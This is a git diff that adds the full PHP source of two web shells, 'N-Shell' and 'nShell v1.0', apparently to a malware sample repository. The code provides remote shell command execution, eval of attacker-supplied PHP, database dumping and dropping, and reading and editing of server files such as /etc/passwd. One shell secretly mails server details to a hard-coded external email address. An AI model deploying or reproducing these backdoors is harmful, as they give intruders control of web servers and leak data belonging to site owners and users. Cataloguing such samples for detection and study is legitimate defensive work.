(empty($add_drop)) { + $add_drop = TRUE; + } + if (sizeof($tabs) == 0) { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) { + while ($row = mysql_fetch_row($res)) { + $tabs[] = $row[0]; + } + } + } + $out = " + # Dumped by N-SHELL.SQL + # Homepage: n0tiz.be and hackers-project.info + # + # Host settings: + # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." + # Date: ".date("d.m.Y H:i:s")." + # DB: \"".$db."\" + #--------------------------------------------------------- + "; + $c = count($onlytabs); + foreach($tabs as $tab) { + if ((in_array($tab,$onlytabs)) or (!$c)) { + if ($add_drop) { + $out .= "DROP TABLE IF EXISTS `".$tab."`;"; + } + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) { + $ret["err"][] = mysql_smarterror(); + } else { + $row = mysql_fetch_row($res); + $out .= $row["1"].";"; + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) { + while ($row = mysql_fetch_assoc($res)) { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) { + $values[$k] = addslashes($v); + } + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');"; + $out .= $sql; + } + } + } + } + } + $out .= " + #--------------------------------------------------------- + "; + if ($file) { + $fp = fopen($file, "w"); + if (!$fp) { + $ret["err"][] = 2; + } else { + fwrite ($fp, nl2br($out)); + fclose ($fp); + } + } + if ($echo) { + if ($nl2br) { + echo nl2br($out); + } else { + echo nl2br($out); + } + } + return $out; + } + function mysql_buildwhere($array,$sep=" and",$functs=array()) { + if (!is_array($array)) { + $array = array(); + } + $result = ""; + foreach($array as $k=>$v) { + $value = ""; + if (!empty($functs[$k])) { + $value .= $functs[$k]."("; + } + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) { + $value .= ")"; + } + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; + } + function mysql_fetch_all($query,$sock) { + if ($sock) { + $result = mysql_query($query,$sock); + } else { + $result = mysql_query($query); + } + $array = array(); + while ($row = mysql_fetch_array($result)) { + $array[] = $row; + } + mysql_free_result($result); + return $array; + } + function mysql_smarterror($type,$sock) { + if ($sock) { + $error = mysql_error($sock); + } else { + $error = mysql_error(); + } + $error = htmlspecialchars($error); + return $error; + } + function mysql_query_form() { + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) { + if (!$sql_query_error) { + $sql_query_error = "Query was empty"; + } + echo "Error:
    ".$sql_query_error."
    "; + } + if ($sql_query_result or (!$sql_confirm)) { + $sql_act = $sql_goto; + } + if ((!$submit) or ($sql_act)) { + echo ""; + if ($tbl_struct) { + echo "
    "; + if (($sql_query) and (!$submit)) { + echo "Do you really want to"; + } else { + echo "SQL-Query"; + } + echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) { + $name = $field["Field"]; + echo "?".$name."
    "; + } + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) { + $sql_query = $sql_last_query; + } + } + function mysql_create_db($db,$sock="") { + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) { + return mysql_query($sql,$sock); + } else { + return mysql_query($sql); + } + } + function mysql_query_parse($query) { + $query = trim($query); + $arr = explode (" ",$query); + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) { + foreach($arr as $k=>$v) { + if (strtoupper($v) == "LIMIT") { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) { + $result["limit"] = array(0,$result["limit"][0]); + } + unset($arr[$k],$arr[$k+1]); + } + } + } + } else { + return FALSE; + } + } + // einde functies phpmyadmin + // Sending headers + @ob_start(); + @ob_implicit_flush(0); + + $sort = htmlspecialchars($sort); + if (empty($sort)) { + $sort = $sort_default; + } + $sort[1] = strtolower($sort[1]); + $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); + if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) { + $DISP_SERVER_SOFTWARE .= ". PHP/".phpversion(); + } + // einde sending headers + + //Starting calls + function getmicrotime() { + list($usec, $sec) = explode(" ", microtime()); + return ((float)$usec + (float)$sec); + } + error_reporting(5); + @ignore_user_abort(TRUE); + @set_magic_quotes_runtime(0); + $win = strtolower(substr(PHP_OS,0,3)) == "win"; + define("starttime",getmicrotime()); + if (get_magic_quotes_gpc()) { + if (!function_exists("strips")) { + function strips(&$arr,$k="") { + if (is_array($arr)) { + foreach($arr as $k=>$v) { + if (strtoupper($k) != "GLOBALS") { + strips($arr["$k"]); + } + } + } else { + $arr = stripslashes($arr); + } + } + } + strips($GLOBALS); + } + $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); + foreach($_REQUEST as $k=>$v) { + if (!isset($$k)) { + $$k = $v; + } + } + + //CONFIGURATION AND SETTINGS + if (!empty($unset_nurl)) { + setcookie("n-shell_nurl"); + $nurl = ""; + } elseif (!empty($set_nurl)) { + $nurl = $set_nurl; + setcookie("n-shell_nurl",$nurl); + } else { + $nurl = $_REQUEST["n-shell_nurl"]; //Set this cookie for manual nurl + } + + $nurl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in nurl. + + if ($nurl_autofill_include and !$_REQUEST["n-shell_nurl"]) { + $include = "&"; + foreach (explode("&",getenv("QUERY_STRING")) as $v) { + $v = explode("=",$v); + $name = urldecode($v[0]); + $value = urldecode($v[1]); + foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { + if (strpos($value,$needle) === 0) { + $includestr .= urlencode($name)."=".urlencode($value)."&"; + } + } + } + if ($_REQUEST["nurl_autofill_include"]) { + $includestr .= "nurl_autofill_include=1&"; + } + } + if (empty($nurl)){ + $nurl = "?".$includestr; //Self url + } + $nurl = htmlspecialchars($nurl) . "x_pwned=pma&"; + + $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending + $sort_save = TRUE; //If TRUE then save sorting-position using cookies. + + $sess_cookie = "n-shellshvars"; // Cookie-variable name + + @$f = $_REQUEST["f"]; + @extract($_REQUEST["n-shellshcook"]); + //END CONFIGURATION + + echo "
    "; + // phpmyadmin + echo "
    "; + + $sql_surl = $surl; + if ($sql_login) { + $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); + } + if ($sql_passwd) { + $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); + } + if ($sql_server) { + $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); + } + if ($sql_port) { + $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); + } + if ($sql_db) { + $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); + } + $sql_surl .= "&"; + echo '"; + if (!$sql_sock) { + echo '"; + //End left panel + echo "
    '; + if ($sql_server) { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) { + $sql_query_result = mysql_query($sql_query,$sql_sock); + $sql_query_error = mysql_smarterror(); + } + } else { + $sql_sock = FALSE; + } + if (!$sql_sock) { + if (!$sql_server) { + echo "Geen connectie"; + } else { + echo "Kan geen connectie maken."; + echo $err; + } + } else { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - '".htmlspecialchars($sql_passwd)."')
    "; + if (count($sqlquicklaunch) > 0) { + foreach($sqlquicklaunch as $item) { + echo "".$item[0]." "; + } + } + } + echo "
    '; + echo "
    UsernamePassword Database 
    HostPORT
    "; + } else { + //Start left panel + echo "
    "; + if (!empty($sql_db)) { + echo '
    '; + $result = mysql_list_tables($sql_db); + if (!$result) { + echo mysql_smarterror(); + } else { + echo "".htmlspecialchars($sql_db)."

    "; + $c = 0; + while ($row = mysql_fetch_array($result)) { + $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); + $count_row = mysql_fetch_array($count); + echo " ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; + mysql_free_result($count); + $c++; + } + if (!$c) { + echo "Geen tabellen gevonden."; + } + } + } else { + echo '
    '; + $result = mysql_list_dbs($sql_sock); + if (!$result) { + echo mysql_smarterror(); + } else { + echo '

    Please, select database
    '; + } + echo "
    "; + echo '
    '; + //Start center panel + $diplay = TRUE; + if ($sql_db) { + if (!is_numeric($c)) { + $c = 0; + } + if ($c == 0) { + $c = "no"; + } + echo "There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) { + foreach($dbsqlquicklaunch as $item) { + echo "[ ".$item[0]." ] "; + } + } + echo ""; + $acts = array("","dump"); + if ($sql_act == "tbldrop") { + $sql_query = "DROP TABLE"; + foreach($boxtbl as $v) { + $sql_query .= "\n`".$v."` ,"; + } + $sql_query = substr($sql_query,0,-1).";"; + $sql_act = "query"; + } elseif ($sql_act == "tblempty") { + $sql_query = ""; + foreach($boxtbl as $v) { + $sql_query .= "DELETE FROM `".$v."` \n"; + } + $sql_act = "query"; + } elseif ($sql_act == "tbldump") { + if (count($boxtbl) > 0) { + $dmptbls = $boxtbl; + } elseif($thistbl) { + $dmptbls = array($sql_tbl); + } + $sql_act = "dump"; + } elseif ($sql_act == "deleterow") { + $sql_query = ""; + if (!empty($boxrow_all)) { + $sql_query = "DELETE * FROM `".$sql_tbl."`;"; + } else { + foreach($boxrow as $v) { + $sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n"; + } + $sql_query = substr($sql_query,0,-1); + } + $sql_act = "query"; + } elseif ($sql_tbl_act == "insert") { + if ($sql_tbl_insert_radio == 1) { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) { + $keys .= "`".addslashes($v)."`, "; + } + if (!empty($keys)) { + $keys = substr($keys,0,strlen($keys)-2); + } + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) { + if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) { + $values .= $funct." ("; + } + $values .= "'".addslashes($v)."'"; + if ($funct) { + $values .= ")"; + } + $values .= ", "; $i++; + } + if (!empty($values)) { + $values = substr($values,0,strlen($values)-2); + } + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } elseif ($sql_tbl_insert_radio == 2) { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") { + echo ""; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) { + if (!$sql_query_error) { + $sql_query_error = "Query was empty"; + } + echo "Error:
    ".$sql_query_error."
    "; + } + if ($sql_query_result or (!$sql_confirm)) { + $sql_act = $sql_goto; + } + if ((!$submit) or ($sql_act)) { + echo "
    "; + if (($sql_query) and (!$submit)) { + echo "Do you really want to:"; + } else { + echo "SQL-Query :"; + } + echo "



     
    "; + } + } + if (in_array($sql_act,$acts)) { + echo '
    Dump DB:
     
    '; + if (!empty($sql_act)) { + echo ""; + } + if ($sql_act == "newtbl") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { + echo "DB '".htmlspecialchars($sql_newdb)."' has been created with success!
    "; + } else { + echo "Can't create DB '".htmlspecialchars($sql_newdb)."'.
    Reason: ".mysql_smarterror(); + } + } elseif ($sql_act == "dump") { + if (empty($submit)) { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode ';') 1: 

    "; + if ($dump_file) { + $tmp = $dump_file; + } else { + $tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"); + } + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } else { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["echo"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) { + $set["onlytabs"] = explode(";",$dmptbls); + } + $ret = mysql_dump($set); + if ($sql_dump_savetofile) { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) { + echo "Dump error! Can't write to '".htmlspecialchars($sql_dump_file)."'!"; + } else { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to '".htmlspecialchars(realpath($sql_dump_file))."'."; + } + } else { + echo "Dumped! Dump has been writed to '".htmlspecialchars(realpath($sql_dump_file))."'."; + } + } + } + if ($diplay) { + if (!empty($sql_tbl)) { + if (empty($sql_tbl_act)) { + $sql_tbl_act = "browse"; + } + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) { + $tbl_struct_fields[] = $row; + } + if ($sql_ls > $sql_le) { + $sql_le = $sql_ls + $perpage; + } + if (empty($sql_tbl_page)) { + $sql_tbl_page = 0; + } + if (empty($sql_tbl_ls)) { + $sql_tbl_ls = 0; + } + if (empty($sql_tbl_le)) { + $sql_tbl_le = 30; + } + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) { + $perpage = 10; + } + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) { + if ($e[0] == "d") { + $asc_desc = "DESC"; + } else { + $asc_desc = "ASC"; + } + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } else { + $v = ""; + } + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Browse ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") { + echo "

    Coming sooon!"; + } + if ($sql_tbl_act == "insert") { + if (!is_array($sql_tbl_insert)) { + $sql_tbl_insert = array(); + } + if (!empty($sql_tbl_insert_radio)) { + } else { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } else { + $values = array(); + } + echo "
    "; + foreach ($tbl_struct_fields as $field) { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) { + $v = ""; + } + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) { + echo " or Save"; + echo ""; + } + echo "

    "; + } + } + if ($sql_tbl_act == "browse") { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo ""; + $b = 0; + for($i=0;$i<$numpages;$i++) { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) { + echo ""; + } + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) { + echo ""; + } + if (($i/30 == round($i/30)) and ($i > 0)) { + echo "
    "; + } else { + echo " "; + } + } + if ($i == 0) { + echo "empty"; + } + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) { + $e[0] = "a"; + } + if ($e[1] != $v) { + echo "".$v.""; + } else { + echo "".$v.""; + } + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) { + $name = mysql_field_name($result,$i); + $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++; + } + if (count($row) > 0) { + $w = substr($w,0,strlen($w)-3); + } + $i = 0; + foreach ($row as $k=>$v) { + $v = htmlspecialchars($v); + if ($v == "") { + $v = "NULL"; + } + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "Delete "; + echo "Edit "; + echo "

    "; + } + } else { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) { + echo mysql_smarterror(); + } else { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsAction
     ".$row["Name"]." ".$row["Rows"]." Empty  Drop Insert 
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

    "; + mysql_free_result($result); + } + } + } + } + } else { + $acts = array(""); + if (in_array($sql_act,$acts)) { + echo "Welkom op de phpmyadmin-clone van n0tiz (n-shell).




    +
    "; + } + if (!empty($_GET['sql_act'])) { + if ($_GET['sql_act'] == "newdb") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { + echo "DB '".htmlspecialchars($sql_newdb)."' has been created with success!
    "; + } else { + echo "Can't create DB '".htmlspecialchars($sql_newdb)."'.
    Reason:
    ".mysql_smarterror(); + } + } + // serverstatus + if ($_GET['sql_act'] == "serverstatus"){ + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:
    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { + echo ""; + } + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + // servervariabelen + if ($_GET['sql_act'] == "servervars") { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:
    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { + echo ""; + } + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($_GET['sql_act'] == "getfile") { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) { + mysql_create_db($tmpdb); + $select = mysql_select_db($tmpdb); + $created = !!$select; + } + if ($select) { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE '".addslashes($sql_getfile)."' INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) { + echo "Error in reading file (permision denied)!"; + } else { + for ($i=0;$iFile '".$sql_getfile."' does not exists or empty!
    "; + } else { + echo "File '".$sql_getfile."':
    ".nl2br(htmlspecialchars($f))."
    "; + } + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + echo "
    "; + echo "
    "; + echo "
    "; + } else if ($_GET['x_pwned'] == 'exec') { // php executer + echo "
    "; + eval(stripslashes($_POST['php'])); + echo "
    "; + } + echo "
    "; + echo '
    '; + echo ""; + echo "
    "; + echo ""; + } else if ($_GET['x_pwned'] == "cmd") { + echo "
    "; + $cmd = $_POST['cmd']; + function myshellexec($cmd) { + global $disablefunc; + $result = ""; + if (!empty($cmd)) { + if (is_callable("exec")) { + exec($cmd,$result); + $result = join("\n",$result); + } else if (($result = $cmd) !== FALSE) { + } else if (is_callable("system")) { + $v = @ob_get_contents(); + @ob_clean(); + system($cmd); + $result = @ob_get_contents(); + @ob_clean(); + echo $v; + } else if (is_callable("passthru")) { + $v = @ob_get_contents(); + @ob_clean(); + passthru($cmd); + $result = @ob_get_contents(); + @ob_clean(); + echo $v; + } else if (is_resource($fp = popen($cmd,"r"))) { + $result = ""; + while(!feof($fp)) { + $result .= fread($fp,1024); + } + pclose($fp); + } + } + return $result; + } + + @chdir($chdir); + if (isset($_POST['submit'])) { + echo "Result of execution this command:"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "

    "; + } else { + echo "

    "; + } + @chdir($olddir); + } else { + echo "Result of execution this command"; + echo "

    "; + if (empty($cmd_txt)) { + $cmd_txt = TRUE; + } + } + echo "
    "; + echo "
    "; + } else if (!isset($_GET['x_pwned']) OR $_GET['x_pwned'] == 'home' OR !$_GET['x_pwned']){ + echo "Welcome on N-shell, the second dutch shell.

    Made by n0tiz and FiLEFUSiON.


    Shouting @ DaiMoNtoR, Flux, Fox, Inspiratio, Rienkrules, Killing-Devil, and all the others...


    Signed for Rienkrules, FiLEFUSiON, kapiteinkoek, Inspiratio and DaiMoNtoR :
    "; + } + echo "© copyright 2007-2008 n0tiz.be and hackers-project.info"; + echo ""; +} +exit(); +?> + + diff --git a/PHP/Backdoor.PHP.NShell.c b/PHP/Backdoor.PHP.NShell.c new file mode 100644 index 00000000..fad5f1e6 --- /dev/null +++ b/PHP/Backdoor.PHP.NShell.c @@ -0,0 +1,371 @@ +?»? + nShell v1.0 + + + +
    + System information: :
    "; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +?> + + + + + +"; +foreach ($arr as $filename) { +if ($filename != "." and $filename != ".."){ +if (is_dir($filename) == true){ +$directory = ""; +$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF'])); +$directory = $directory . ""; +$dires = $dires . $directory; +} +if (is_file($filename) == true){ +$file = ""; +$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']); +$file = $file . ""; +$files = $files . $file; +} +} +} +echo $dires; +echo $files; +echo "
    +Safe_mode: ON"):("Safe_mode: OFF")); +echo " "; +// phpversion +echo "Php version : ".@phpversion().""; +echo " "; +// curl +$curl_on = @function_exists('curl_version'); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); +echo " "; +// mysql +echo "MYSQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){echo "ON";}else{echo "OFF";} +echo " "; +// msssql +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo " "; +// PostgreSQL +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo " "; +// Oracle +echo "Oracle: "; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "ON";}else{echo "OFF";} +echo "
    "; +echo " "; +// Disable function +echo "Disable functions : "; +$df=@ini_get('disable_functions'); +if(!$df){echo "NONE";}else{echo "$df";} +echo " "; +//==============xac dinh os================== +$servsoft = $_SERVER['SERVER_SOFTWARE']; +if (ereg("Win32", $servsoft)){ +$sertype = "win"; +} +else +{ +$sertype = "nix"; +} +//========================================= + +$uname=ex('uname -a'); + echo "
    OS: "; + if (empty($uname)){ + echo (php_uname()."
    "); + }else + echo $uname."
    "; + $id = ex('id'); + $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; + echo "SERVER: ".$server."
    "; + echo "id: "; + if (!empty($id)){ + echo $id."
    "; + }else + echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). + "
    "; +echo "Php Info
    "; + +?> +
    File ManagerSql QueryEval()
    + Php Version :".phpversion().""; +phpinfo(); +echo ""; +} +?> +
    NameTypeSizePermsDelete
    $filename" .ucwords(filetype($filename)) . "" . perms(fileperms($filename))."Del
    $filename" .ucwords(filetype($filename)). "" . filesize($filename) . "" . perms(fileperms($filename))."Del Edit

    "; +} +// view file ex: /etc/passwd +if(isset($_REQUEST['file'])) + { +$file=@$_REQUEST["file"]; +echo "File : ". $file.""; +$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File"); +$src=@fread($fp,filesize($file)); +echo "



    "; +$addtxt=@$_POST["addtxt"]; + rewind($fp); + if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt)); + if($rs==true) + { + echo "Noi dung cua file nay da duoc sua doi !Xem lai"; + } + ftruncate($fp,ftell($fp)); +echo "
    "; + } + +?> + +Query # ".$query."
    "; +$result=@mysql_query($query) or die("Khong update du lieu duoc !"); +if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^
    "; +} +function exe_c($query) +{ +echo "Query # ".$query."
    "; +$result=@mysql_query($query) or die("Khong Create duoc !"); +echo "This is Ok ! ^.^
    " ; +} +function exe_d($query) +{ +echo "Query # ".$query."
    "; +$result=@mysql_query($query) or die("Khong Drop duoc !"); +echo "This is Ok ! ^.^
    " ; +} +function exe_w($query) +{ +echo "Query # ".$query."
    "; +$result=@mysql_query($query) or die("Khong the show gi duoc het !"); +if(eregi("fields",$query)) { +while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ +echo "".$row['Field']." : ".$row['Type']; +echo "
    "; +} +} else { +while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){ + while(list($key,$value)=each($row)) +{ + echo "".$value.""; +} +echo "
    "; +} +} +} +function exe_s($query) +{ +$arrstr=@array();$i=0; +$arrstr=explode(" ",$query); +$find_field=@mysql_query("show fiedls from ".$arrstr['4']); +while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){ +$i++; +$arrstr[$i]=$find_row['Field']; +} +echo "Query # ".$query."
    "; +$result=@mysql_query($query) or die("Khong the select gi duoc het !"); +$row=@mysql_num_rows($result); +} +function sql($string) +{ +$arr=@array(); +$arr=explode(";",$string); +for($i=0;$i<=count($arr);$i++) + { + $check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); + $check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]); + $check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]); + $check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]); + $check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]); + $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]); + } +} +//=====xong phan function cho sql +// Sql query +if($act=="sql") +{ + if(isset($_GET['srname'])&&isset($_GET['pass'])) + { + echo $_GET['srname']; +if(!isset($_GET['srname'])) $servername=$_GET['srname']; + else $servername="localhost"; +$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !"); +$form2="

    "; +echo $form2; +$str=@$_POST['str']; +if(isset($str)) sql($str); + } + else { + echo "chao"; + $form1="
    User Name : Server Name :
    Password : Port :

    "; + echo $form1; + } +} +?> + +

    "; +}else{ +eval($script); +} +} +?> + + + +!nShell v1.0. Code by Navaro.
    Have Fun ! {^.^} { ~.~} +
